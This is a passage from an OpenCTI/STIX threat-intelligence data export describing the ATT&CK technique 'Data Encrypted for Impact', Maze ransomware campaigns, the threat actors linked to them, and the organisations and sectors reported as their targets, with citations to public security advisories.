"url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
"x_opencti_id": "91442889-36b4-436b-86ea-a67542cb018f",
"x_opencti_created": "2019-10-23T15:38:46.000Z",
"x_opencti_modified": "2019-10-23T15:38:46.000Z"
},
{
"id": "external-reference--8a9f44d5-9c54-4d6a-8f06-c776d20decc0",
"source_name": "FireEye WannaCry 2017",
"description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
"url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"x_opencti_id": "55d930ed-428b-461c-bfc6-c965a20503a9",
"x_opencti_created": "2019-10-24T00:14:40.000Z",
"x_opencti_modified": "2019-10-24T00:14:40.000Z"
}
]
},
{
"id": "attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"type": "attack-pattern",
"x_opencti_external_id": "T1486",
"name": "Data Encrypted for Impact",
"labels": [
"attack-pattern"
],
"description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)",
"created": "2019-09-18T13:45:36.000Z",
"modified": "2020-02-01T21:32:07.439Z",
"x_opencti_id": "e7c0fb6c-dc23-4a1e-ba65-73b39b8ed370",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
],
"external_references": [
{
"id": "external-reference--f5655366-c71e-4493-bfde-91146fabb267",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1486",
"external_id": "T1486",
"x_opencti_id": "5db393d7-4a82-4c5b-885f-dc0b379e0abf",
"x_opencti_created": "2019-10-24T03:53:40.000Z",
"x_opencti_modified": "2019-10-24T03:53:40.000Z"
},
{
"id": "external-reference--4b46fe41-befa-4745-b5cf-d0061135fd66",
"source_name": "US-CERT SamSam 2018",
"description": "US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.",
"url": "https://www.us-cert.gov/ncas/alerts/AA18-337A",
"x_opencti_id": "3d2eb604-acff-4ecd-ba65-10bb98789e3d",
"x_opencti_created": "2019-10-24T03:53:43.000Z",
"x_opencti_modified": "2019-10-24T03:53:43.000Z"
},
{
"id": "external-reference--ae8af219-ebb7-4c77-8002-2b778c1d8a57",
"source_name": "US-CERT Ransomware 2016",
"description": "US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.",
"url": "https://www.us-cert.gov/ncas/alerts/TA16-091A",
"x_opencti_id": "1e3f964d-cd33-42cb-9ecf-370e4d240203",
"x_opencti_created": "2019-10-24T03:53:41.000Z",
"x_opencti_modified": "2019-10-24T03:53:41.000Z"
},
{
"id": "external-reference--8a9f44d5-9c54-4d6a-8f06-c776d20decc0",
"source_name": "FireEye WannaCry 2017",
"description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
"url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"x_opencti_id": "55d930ed-428b-461c-bfc6-c965a20503a9",
"x_opencti_created": "2019-10-24T00:14:40.000Z",
"x_opencti_modified": "2019-10-24T00:14:40.000Z"
},
{
"id": "external-reference--1cdc3a31-9ff6-483c-94fb-c553c9bbe0ed",
"source_name": "US-CERT NotPetya 2017",
"description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
"url": "https://www.us-cert.gov/ncas/alerts/TA17-181A",
"x_opencti_id": "4b947fa5-30d0-4dae-86e6-ea30cd215525",
"x_opencti_created": "2019-10-24T03:53:42.000Z",
"x_opencti_modified": "2019-10-24T03:53:42.000Z"
}
]
},
{
"id": "identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"type": "identity",
"name": "Insurance services (NIS)",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Insurance brokers etc.",
"created": "2019-01-31T14:01:30.000Z",
"modified": "2019-01-31T14:01:30.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "5774b873-60d8-3628-9a4b-9415e52101d4"
},
{
"id": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"type": "identity",
"name": "Andrew Agencies",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Canadian insurance company.",
"created": "2020-02-04T15:06:17.875Z",
"modified": "2020-02-04T15:06:17.875Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "7d00e1a3-a731-43d8-a39b-972381467380",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"type": "identity",
"name": "Southwire",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Leading wire and cables US-based manufacturer.",
"created": "2020-01-08T16:05:17.311Z",
"modified": "2020-01-08T16:05:17.311Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "e2753312-1090-492d-a8fd-56ca36675d35",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"type": "identity",
"name": "Allied Universal",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-based security company.",
"created": "2020-02-04T15:10:55.068Z",
"modified": "2020-02-04T15:10:55.068Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "9ca2ff43-b765-4f13-a213-10664a2ae8fc",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"type": "identity",
"name": "Bouygues Construction",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "French construction company",
"created": "2019-07-29T12:48:06.000Z",
"modified": "2019-12-09T13:26:15.000Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "5d42255b-32a0-48bb-9996-6700edb49574"
},
{
"id": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"type": "identity",
"name": "City of Pensacola",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US municipality.",
"created": "2020-01-08T16:10:09.971Z",
"modified": "2020-01-08T16:10:09.971Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "be1d7745-bd73-4763-93cc-34928036caa3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"type": "identity",
"name": "Food and drinks",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Businesses preparing and serving food and drinks to customers in exchange for money.",
"created": "2019-11-04T17:50:08.000Z",
"modified": "2019-11-04T17:50:08.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "b62c846b-669d-4222-89c2-79722fa65587"
},
{
"id": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"type": "identity",
"name": "Fratelli Beretta",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Italian Food company.",
"created": "2020-02-04T15:24:49.316Z",
"modified": "2020-02-04T15:24:49.316Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "dab03369-f673-4fc1-ad48-159ae5ebfa6e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"type": "identity",
"name": "Stockdale radiology",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Healthcare company in US",
"created": "2020-02-04T15:30:45.143Z",
"modified": "2020-02-04T15:30:45.143Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "a8dd629e-9bbb-43fc-a409-dc6d6e96e221"
},
{
"id": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"type": "identity",
"name": "Lakeland Community College",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-Based school.",
"created": "2020-02-04T15:37:34.747Z",
"modified": "2020-02-04T15:37:34.747Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "cab0b94e-b957-4f6d-a648-3d9323307f04",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--65463837-a41a-4b61-a074-b2f20f097555",
"type": "identity",
"name": "Schools",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Public and private institutions for all primary and secondary school levels.",
"created": "2019-11-04T17:56:05.000Z",
"modified": "2019-11-04T17:56:05.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "46444953-5f31-41b6-9839-da630822c59b"
},
{
"id": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"type": "identity",
"name": "Medical Diagnostic Laboratories",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-based Healthcare company.",
"created": "2020-02-04T15:42:41.951Z",
"modified": "2020-02-04T15:42:41.951Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "ba7a5f83-99d3-4c5a-a742-41f3674fe346",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"type": "identity",
"name": "Hamilton and Naumes",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-based law firm.",
"created": "2020-02-04T15:46:52.908Z",
"modified": "2020-02-04T15:46:52.908Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "433161e8-7405-4ac0-812e-e398c930cc2e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"type": "identity",
"name": "Construction",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Private entities engaged in preparation of land and construction, alteration and repair of building, structures and other real estate properties. ",
"created": "2019-03-07T08:38:38.000Z",
"modified": "2019-03-07T08:38:38.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "8e78d78b-906c-35fd-bea8-dee3b69df22b"
},
{
"id": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"type": "identity",
"name": "Bird Construction",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "General contractor Bird Construction, which is based in Toronto, was allegedly targeted by cyber-threat group MAZE in December 2019. MAZE claims to have stolen 60 GB of data from the company",
"created": "2020-02-04T15:50:28.195Z",
"modified": "2020-02-04T15:50:28.195Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "08670c23-5bdc-45b5-889c-9a87f976df6a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"type": "identity",
"name": "Consulting",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Private entities providing expert advice in a specific field to external entities.",
"created": "2019-01-31T07:46:12.000Z",
"modified": "2019-01-31T07:46:12.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "2ac90d70-72ee-30a9-8a8d-5f5b44e1bb00"
},
{
"id": "identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"type": "identity",
"name": "Legal consulting",
"identity_class": "class",
"labels": [
"identity"
],
"description": "No description",
"created": "2019-11-04T17:58:54.000Z",
"modified": "2019-11-04T17:58:54.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "d818aba6-0646-4678-9b52-1aebfb5281da"
},
{
"id": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"type": "identity",
"name": "Canada",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Canada",
"created": "2019-05-06T13:11:56.000Z",
"modified": "2019-05-06T13:11:56.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "d0523f94-b69c-3114-8655-98c37bdf5a67"
},
{
"id": "identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"type": "identity",
"name": "Italy",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Italy",
"created": "2019-05-07T11:47:45.000Z",
"modified": "2019-05-07T11:47:45.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "96e500e7-abfa-3847-8874-57c493cb27c9"
},
{
"id": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"type": "identity",
"name": "Healthcare services",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Hospitals and other direct medical practice activities.",
"created": "2019-01-31T15:09:17.000Z",
"modified": "2019-01-31T15:09:17.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "6beae44c-2be7-315c-83f2-c0b4b0b4e4d6"
},
{
"id": "identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"type": "identity",
"name": "Local administrations",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Public administrations and government bodies managing a local territory under the global authority of a central government.",
"created": "2019-11-04T18:01:13.000Z",
"modified": "2019-11-04T18:01:13.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "daf1af32-6ac5-42f8-a92c-fe6238d758d4"
},
{
"id": "identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"type": "identity",
"name": "Manufacturing",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Private entities transforming and selling goods, products and equipment which are not included in other activity sectors.",
"created": "2019-10-09T15:47:13.000Z",
"modified": "2019-12-09T13:26:06.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "e8c239ed-a248-4916-9e8f-0be1f4678639"
},
{
"id": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"type": "identity",
"name": "United States of America",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "United States of America",
"created": "2019-04-17T09:03:11.000Z",
"modified": "2019-04-17T09:03:11.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "c8c32fa5-576a-328d-b8b3-fb6d8a8d5355",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"type": "identity",
"name": "France",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "France",
"created": "2019-04-17T09:38:41.000Z",
"modified": "2019-04-17T09:38:41.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "e3660e35-a97d-381d-8ce9-692f3ad44f3e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"type": "threat-actor",
"name": "gladkoff1991",
"labels": [
"threat-actor"
],
"description": "email address [email protected] has been used to register C2 domains and is th only indicator associated with the operator of the campaign.\n",
"created": "2019-11-07T14:23:17.000Z",
"modified": "2019-11-07T14:23:17.000Z",
"x_opencti_id": "05989a20-6925-4657-94a7-bea5d945aa25"
},
{
"id": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"type": "threat-actor",
"name": "TA2101",
"labels": [
"threat-actor"
],
"description": "Cybercriminal Threat Actor oberved by Proofpoint and using Maze ransomware during phishing campaings impersonating german or italian authorities in october and november 2019. These campaigns targeted germany, Italy and US entities.",
"created": "2020-01-07T14:20:48.079Z",
"modified": "2020-01-07T14:21:50.319Z",
"x_opencti_id": "a615bbcf-bb97-4d3e-8d5b-748cd7519acd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--19723a17-c942-4231-96f7-73db1c0d373b",
"type": "relationship",
"relationship_type": "uses",
"description": "The campaign was accompanied by a malicious Microsoft Word attachment with a purported RSA\nSecurID key, similarly-formatted to the one used in the previous campaigns.",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:50:11.226Z",
"modified": "2020-01-07T14:50:11.226Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7f88e39a-bc1a-41fa-b78f-20b90f423f2a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--940e927a-c350-495c-a612-96e91487c228",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T14:45:19.013Z",
"modified": "2020-02-04T14:45:19.013Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-06T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ace44529-755b-4ab6-9a7e-886211b34f4a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--c9f8f9a4-024d-4c09-befd-d136554c1e04",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"created": "2020-02-04T15:12:34.675Z",
"modified": "2020-02-04T15:12:34.675Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 2,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "776cb63b-5e77-411e-86ad-740e1725b6bf",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--aaa6aa7d-b035-4d85-bedc-be3091883fff",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"target_ref": "identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"x_opencti_source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"x_opencti_target_ref": "identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"created": "2020-02-04T15:19:15.017Z",
"modified": "2020-02-04T15:19:15.017Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "24401885-fef3-425a-b65b-6857589ce2e6",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--efa9ef88-96e7-43ed-95ce-52c2d23b617d",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"target_ref": "identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"x_opencti_source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"x_opencti_target_ref": "identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"created": "2020-02-04T15:27:55.998Z",
"modified": "2020-02-04T15:27:55.998Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "dfb7c972-509e-4f3b-a5c5-2dfb902810d9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5df6632a-63b8-4e12-befc-32f74cf0c0bc",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"created": "2020-02-04T15:47:40.326Z",
"modified": "2020-02-04T15:47:40.326Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "15242c25-8906-4223-9b28-b60fe66bd6ae",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--ce6959d6-e046-4bf7-96c7-1fd974c5ee8b",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:28.764Z",
"modified": "2020-02-05T10:05:28.764Z",
"x_opencti_first_seen": "2020-02-05T10:05:28.764Z",
"x_opencti_last_seen": "2020-02-05T10:05:28.764Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6a9b457c-fe5b-4bbd-8512-9c4d8e1ac78b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f89b7a83-518c-4711-b1a1-3b4632f6e91c",
"type": "relationship",
"relationship_type": "uses",
"description": "On October 29, Proofpoint researchers observed dozens of emails attempting to deliver malicious Microsoft Word attachments with Italian lures impersonating the Agenzia Entrate, the Italian Ministry\nof Taxation.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:36:27.227Z",
"modified": "2020-01-07T14:36:27.227Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e93b149f-8532-4104-808f-454bfc583011",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--f4e9424b-417e-486b-81f3-e411f3fe779f",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"target_ref": "malware--b03a728b-69c3-4734-a50e-94517938c419",
"x_opencti_source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"x_opencti_target_ref": "malware--b03a728b-69c3-4734-a50e-94517938c419",
"created": "2020-02-04T14:49:20.367Z",
"modified": "2020-02-04T14:49:20.367Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-17T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7e14df5c-c74d-401f-83e8-c39e29fb3111",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--bd07e2f9-0e97-469d-825c-14f68d77c55f",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:18:21.629Z",
"modified": "2020-02-04T15:18:21.629Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2243b128-141d-45b2-8c9e-e5a17558b66a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--3dcf9dd6-93c4-48ab-9828-b8bf7246b666",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-01-08T16:07:00.847Z",
"modified": "2020-01-08T16:07:00.847Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c9bec55b-20ea-4008-9566-37c9eb278b0d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--1630916b-cfe9-4f25-b96f-8694d5aa2bfa",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-01-08T16:11:47.079Z",
"modified": "2020-01-08T16:11:47.079Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "1ce495c3-e564-443e-bb60-719858aa05e9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--02611de8-57da-42c4-a07f-b34b35ee599c",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
